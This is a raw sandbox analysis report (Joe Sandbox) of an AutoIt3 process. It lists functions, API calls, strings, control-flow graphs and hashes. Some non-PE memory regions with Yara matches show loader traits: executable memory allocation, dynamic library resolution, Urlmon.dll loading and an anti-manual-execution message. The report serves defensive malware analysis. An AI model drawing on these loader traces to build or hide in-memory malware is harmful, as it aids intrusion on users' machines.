                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$`
                                      • API String ID: 2673923337-2813422417
                                      • Opcode ID: 580f85859eadf8eb5868b40ee8ffb633d5e95541d386e5b0c55977e7cdc6807e
                                      • Instruction ID: 05cd38b30265ad47a695b2a75587322abc02148e2881a4cb36a2c645b73462db
                                      • Opcode Fuzzy Hash: 580f85859eadf8eb5868b40ee8ffb633d5e95541d386e5b0c55977e7cdc6807e
                                      • Instruction Fuzzy Hash: F67138715497119EC714EF69E889DABBBB8FF58340F40052EF555C32A1EF309988CB92
                                      Function 008033E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00803444
                                      • RegisterClassExW.USER32(00000030), ref: 0080346E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                      • InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                      • LoadIconW.USER32(000000A9), ref: 008034C2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 8814e9d76a3879153bf53fa93f9e00b15445cb02cfe0b7abcfe4c8881b46adf1
                                      • Instruction ID: 672edb765e45ca29ebb90bb05c055e0e1712c53d68d65dc7cf28109922e30f6d
                                      • Opcode Fuzzy Hash: 8814e9d76a3879153bf53fa93f9e00b15445cb02cfe0b7abcfe4c8881b46adf1
                                      • Instruction Fuzzy Hash: E93125B1844309AFDB40DFA4EC88BC9BBF0FB08320F14412AF691E62A0D7B50585CF94
                                      Function 00803411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00803444
                                      • RegisterClassExW.USER32(00000030), ref: 0080346E
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                      • InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                      • LoadIconW.USER32(000000A9), ref: 008034C2
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 2db225bf8ed8a29cabba163a12086dc227b7bf39437504085dd38b8d71626414
                                      • Instruction ID: 4a082616fd3c06e6b323552c3419c8221dc301a9d7da629d7715720504a73494
                                      • Opcode Fuzzy Hash: 2db225bf8ed8a29cabba163a12086dc227b7bf39437504085dd38b8d71626414
                                      • Instruction Fuzzy Hash: E121E3B1904218AFEB40AFE4EC89B9DBBF4FB08710F04411AFA21A62A0D7B21544CF95
                                      Function 011D11A1 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1279 11d11a1-11d11b5 1280 11d11c1-11d11c7 1279->1280 1281 11d11ce-11d11d3 1280->1281 1282 11d11c9-11d11cc 1280->1282 1284 11d11d5-11d11db 1281->1284 1285 11d11e2-11d11ea 1281->1285 1282->1281 1283 11d11b7-11d11bf CharNextA 1282->1283 1283->1280 1284->1285 1286 11d11dd-11d11e0 1284->1286 1287 11d1247-11d124c 1285->1287 1286->1280 1288 11d11ec-11d11f1 1287->1288 1289 11d124e-11d126b call 11d27d9 1287->1289 1291 11d1233-11d1245 CharNextA 1288->1291 1292 11d11f3-11d11fd CharNextA 1288->1292 1295 11d12e8-11d12ed 1289->1295 1291->1287 1294 11d1213-11d1219 1292->1294 1296 11d121b-11d121e 1294->1296 1297 11d1220-11d1225 1294->1297 1300 11d126d-11d1272 1295->1300 1301 11d12f3-11d1304 1295->1301 1296->1297 1298 11d11ff-11d1211 CharNextA 1296->1298 1297->1287 1299 11d1227-11d1231 CharNextA 1297->1299 1298->1294 1299->1287 1302 11d12c4-11d12d2 CharNextA 1300->1302 1303 11d1274-11d127e CharNextA 1300->1303 1302->1295 1305 11d12d4-11d12e6 1302->1305 1304 11d12a4-11d12aa 1303->1304 1306 11d12ac-11d12af 1304->1306 1307 11d12b1-11d12b6 1304->1307 1305->1295 1305->1305 1306->1307 1308 11d1280-11d128e CharNextA 1306->1308 1307->1295 1309 11d12b8-11d12c2 CharNextA 1307->1309 1308->1304 1310 11d1290-11d12a2 1308->1310 1309->1295 1310->1304 1310->1310
                                      APIs
                                      • CharNextA.USER32(00000000), ref: 011D11F6
                                      • CharNextA.USER32(00000000,00000000), ref: 011D1202
                                      • CharNextA.USER32(00000000,00000000), ref: 011D122A
                                      • CharNextA.USER32(00000000), ref: 011D1236
                                      • CharNextA.USER32(?,00000000), ref: 011D1277
                                      • CharNextA.USER32(00000000,?,00000000), ref: 011D1283
                                      • CharNextA.USER32(00000000,?,00000000), ref: 011D12BB
                                      • CharNextA.USER32(?,00000000), ref: 011D12C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: $"$"
                                      • API String ID: 3213498283-938660540
                                      • Opcode ID: d316ed03cc4c61b4f1638d1c38ba63b0d80f02d362ec4b184a513fd5a617f086
                                      • Instruction ID: 4c7bfc9cfcb82e6a43f6422e0635338e2ddbdf7fcc5f492d2c9c522169c08256
                                      • Opcode Fuzzy Hash: d316ed03cc4c61b4f1638d1c38ba63b0d80f02d362ec4b184a513fd5a617f086
                                      • Instruction Fuzzy Hash: CF51F6B4A08282EFE329DFBCD484A16BBE5EF2A350B75084DE4C4CB342D335A840DB51
                                      Function 0081514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00815156
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00815165
                                      • LoadIconW.USER32(00000063), ref: 0081517C
                                      • LoadIconW.USER32(000000A4), ref: 0081518E
                                      • LoadIconW.USER32(000000A2), ref: 008151A0
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008151C6
                                      • RegisterClassExW.USER32(?), ref: 0081521C
                                        • Part of subcall function 00803411: GetSysColorBrush.USER32(0000000F), ref: 00803444
                                        • Part of subcall function 00803411: RegisterClassExW.USER32(00000030), ref: 0080346E
                                        • Part of subcall function 00803411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080347F
                                        • Part of subcall function 00803411: InitCommonControlsEx.COMCTL32(?), ref: 0080349C
                                        • Part of subcall function 00803411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008034AC
                                        • Part of subcall function 00803411: LoadIconW.USER32(000000A9), ref: 008034C2
                                        • Part of subcall function 00803411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008034D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: e79885b54ccf30d3a3b2576485b74fd895f890d53bac69b59cba233ee53457e5
                                      • Instruction ID: e05f79029c4e34c7d849dd7997060e1db42f3d3cc68a53e2686b1c71b62edc5d
                                      • Opcode Fuzzy Hash: e79885b54ccf30d3a3b2576485b74fd895f890d53bac69b59cba233ee53457e5
                                      • Instruction Fuzzy Hash: 62215771D04308AFEB109FA9ED09F9D7BF5FB08321F00411AF605A62A0D7B65950CF84
                                      Function 00814D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1453 814d83-814dd1 1455 814e31-814e33 1453->1455 1456 814dd3-814dd6 1453->1456 1455->1456 1457 814e35 1455->1457 1458 814e37 1456->1458 1459 814dd8-814ddf 1456->1459 1460 814e1a-814e22 DefWindowProcW 1457->1460 1461 8509c2-8509f0 call 80c460 call 80c483 1458->1461 1462 814e3d-814e40 1458->1462 1463 814de5-814dea 1459->1463 1464 814ead-814eb5 PostQuitMessage 1459->1464 1466 814e28-814e2e 1460->1466 1497 8509f5-8509fc 1461->1497 1468 814e42-814e43 1462->1468 1469 814e65-814e8c SetTimer RegisterWindowMessageW 1462->1469 1470 850a35-850a49 call 862cce 1463->1470 1471 814df0-814df2 1463->1471 1467 814e61-814e63 1464->1467 1467->1466 1474 850965-850968 1468->1474 1475 814e49-814e5c KillTimer call 815ac3 call 8034e4 1468->1475 1469->1467 1476 814e8e-814e99 CreatePopupMenu 1469->1476 1470->1467 1489 850a4f 1470->1489 1477 814eb7-814ec6 call 815b29 1471->1477 1478 814df8-814dfd 1471->1478 1484 85099e-8509bd MoveWindow 1474->1484 1485 85096a-85096c 1474->1485 1475->1467 1476->1467 1477->1467 1479 814e03-814e08 1478->1479 1480 850a1a-850a21 1478->1480 1487 814e9b-814eab call 815bd7 1479->1487 1488 814e0e-814e14 1479->1488 1480->1460 1495 850a27-850a30 call 858854 1480->1495 1484->1467 1492 85098d-850999 SetFocus 1485->1492 1493 85096e-850971 1485->1493 1487->1467 1488->1460 1488->1497 1489->1460 1492->1467 1493->1488 1498 850977-850988 call 80c460 1493->1498 1495->1460 1497->1460 1502 850a02-850a15 call 815ac3 call 8159d3 1497->1502 1498->1467 1502->1460
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00814E22
                                      • KillTimer.USER32(?,00000001), ref: 00814E4C
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00814E6F
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00814E7A
                                      • CreatePopupMenu.USER32 ref: 00814E8E
                                      • PostQuitMessage.USER32(00000000), ref: 00814EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: b7ff7fa276fa3e293e8f018d20006d5adba7dec84c717d9ea411a8dc1387a17a
                                      • Instruction ID: 18c71f8737123e676f11f713a61c5e6ed03096089e74a9ae9a9f104ad7b566db
                                      • Opcode Fuzzy Hash: b7ff7fa276fa3e293e8f018d20006d5adba7dec84c717d9ea411a8dc1387a17a
                                      • Instruction Fuzzy Hash: 7F41EB31248209ABDB556F68AC49FFA36ADFF40321F041529FA02D11E1CB71ECD49F66
                                      Function 03CF8AF4 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 29libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1510 3cf8af4-3cf8b63 GetModuleHandleA LoadLibraryA
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8AFF
                                      • LoadLibraryA.KERNELBASE(Urlmon.dll,?,03D219A1,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03CF8B2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleLibraryLoadModule
                                      • String ID: Advapi32.dll$LoadLibraryA$Shell32.dll$Urlmon.dll$kernel32.dll$ntdll.dll$user32.dll
                                      • API String ID: 4133054770-1140356178
                                      • Opcode ID: b6cc218b94c0b06744b07ad930702b9effb87d2109c1edabcb51cc58ca4b2072
                                      • Instruction ID: 3a6e4c96858f00ce465a69fe16a5195f8a997ac29532ebd065a01401db678b7f
                                      • Opcode Fuzzy Hash: b6cc218b94c0b06744b07ad930702b9effb87d2109c1edabcb51cc58ca4b2072
                                      • Instruction Fuzzy Hash: 3EF0B7F66467109FDBE0FFA598999283AF0FA756113004069F621C6319DF704411FF22
                                      Function 011D7B6D Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 156windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxA.USER32(00000000,Executing manually will not work,011D7E19,00000000), ref: 011D7BC9
                                      • MessageBoxA.USER32(00000000,011D7E41,011D7E19,00000000), ref: 011D7C41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Executing manually will not work$libeay32.dll$libssl32.dll$tdFBRmkc
                                      • API String ID: 2030045667-1446224538
                                      • Opcode ID: 5c59ccd4e269cb51248727b7889413f1cb88641dd6b82fb74b98e14dbd2df3d9
                                      • Instruction ID: 965c3d50095fcef4af1411c1ce917b490062e1cadcbb1636a537545bf2c77241
                                      • Opcode Fuzzy Hash: 5c59ccd4e269cb51248727b7889413f1cb88641dd6b82fb74b98e14dbd2df3d9
                                      • Instruction Fuzzy Hash: 64613C34A0620D9BCB1CEB94D591F9DB7B1FB9830CF5081A5E824A3388DB34ED45CB52
                                      Function 008150DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00815109
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0081512A
                                      • ShowWindow.USER32(00000000), ref: 0081513E
                                      • ShowWindow.USER32(00000000), ref: 00815147
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: c88c28392eccf7dfb1872f1d4fe9fe93a880399a7094a12ae99d4dad39733bca
                                      • Instruction ID: 865621caf5c63f199614c96490750088dd8eb91154a74bbf3f68e3600b1a4c3b
                                      • Opcode Fuzzy Hash: c88c28392eccf7dfb1872f1d4fe9fe93a880399a7094a12ae99d4dad39733bca
                                      • Instruction Fuzzy Hash: CCF0F871645294BEEA312B67AC4CE373E7EF7C6F60F04411EBA01A22B0C6751851DEB0
                                      Function 00869B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00814A8C: _fseek.LIBCMT ref: 00814AA4
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DE1
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DF4
                                      • _free.LIBCMT ref: 00869C5F
                                      • _free.LIBCMT ref: 00869C66
                                      • _free.LIBCMT ref: 00869CD1
                                        • Part of subcall function 00822F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822F99
                                        • Part of subcall function 00822F85: GetLastError.KERNEL32(00000000,?,00829C54,00000000,00828D5D,008259C3), ref: 00822FAB
                                      • _free.LIBCMT ref: 00869CD9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 1552873950-2806939583
                                      • Opcode ID: 54e9caaeeea232c8f5b10cc8ae3c22ee1cfdecd395bbeddf28086b5de3fc6b3b
                                      • Instruction ID: 49a89f0088b172aa72f33c5949ae0334465586cba64f598a40ae1f445ee6e645
                                      • Opcode Fuzzy Hash: 54e9caaeeea232c8f5b10cc8ae3c22ee1cfdecd395bbeddf28086b5de3fc6b3b
                                      • Instruction Fuzzy Hash: 4B512DB1904229AFDF249F68DC41A9EBBB9FF48304F01059EF649E3281DB715A84CF59
                                      Function 0082563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                      • Instruction ID: e9be11f5930af096f683c51a73fa2af162279a0c7cd45abf0a265e2d365a2f36
                                      • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                      • Instruction Fuzzy Hash: 8A51D270A80B29DFDB248EA9E88466E77B1FF50324F648729F835D62D0D7709DD08B40
                                      Function 008052B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080534A
                                      • TranslateMessage.USER32(?), ref: 00805356
                                      • DispatchMessageW.USER32(?), ref: 00805360
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      • Opcode ID: 77ec4fb9b45517ea2a353d90ae806c80dc1e05ea6a7fb386436ef69778897f95
                                      • Instruction ID: 32384b9d1bf4a9c09b1ad3c8f11920db3f0fd6475ba819e68e038112e1d48dd1
                                      • Opcode Fuzzy Hash: 77ec4fb9b45517ea2a353d90ae806c80dc1e05ea6a7fb386436ef69778897f95
                                      • Instruction Fuzzy Hash: 58311230508B0A9FEB708B64EC84FAB77B8FB42344F15406AE512D62E1DBB19884DF61
                                      Function 00801284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012A8
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012C9
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00801275,SwapMouseButtons,00000004,?), ref: 008012EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: da34a564ab26fc9fdf3cb0e1c605afcb784f5498f97f67758bc8b615b782e225
                                      • Instruction ID: 916cbba94bbb1862333b7fae5041b00ea129245af6aff29ea9553bab54601810
                                      • Opcode Fuzzy Hash: da34a564ab26fc9fdf3cb0e1c605afcb784f5498f97f67758bc8b615b782e225
                                      • Instruction Fuzzy Hash: C7114571610208BFDF61CFA8DC88AAEBBA8FF05751F00456AE809D7250E2319E409BA0
                                      Function 011D7495 Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 011D752A
                                      • LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 011D75C9
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 011D762D
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 011D7644
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocLibraryLoadVirtual
                                      • String ID:
                                      • API String ID: 857568384-0
                                      • Opcode ID: 07b4a39dda95eb49eeca4de4c5c3682a3a78871ee9eac48f98c00806c9a77f70
                                      • Instruction ID: 28bd2dc663df031dfa26eee7ab7cc98dd6254d099689df92f17a64900c78adbb
                                      • Opcode Fuzzy Hash: 07b4a39dda95eb49eeca4de4c5c3682a3a78871ee9eac48f98c00806c9a77f70
                                      • Instruction Fuzzy Hash: 0E81E371A002299FDB69CF28CC81BD9B3B5FF59314F0586D5E948A7341E770AE908F91
                                      Function 03CF3E5C Relevance: 6.1, APIs: 4, Instructions: 72fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18,?,?,?,?), ref: 03CF3EAB
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,03CF3EF8,?,00000000,03CF3F18), ref: 03CF3EBA
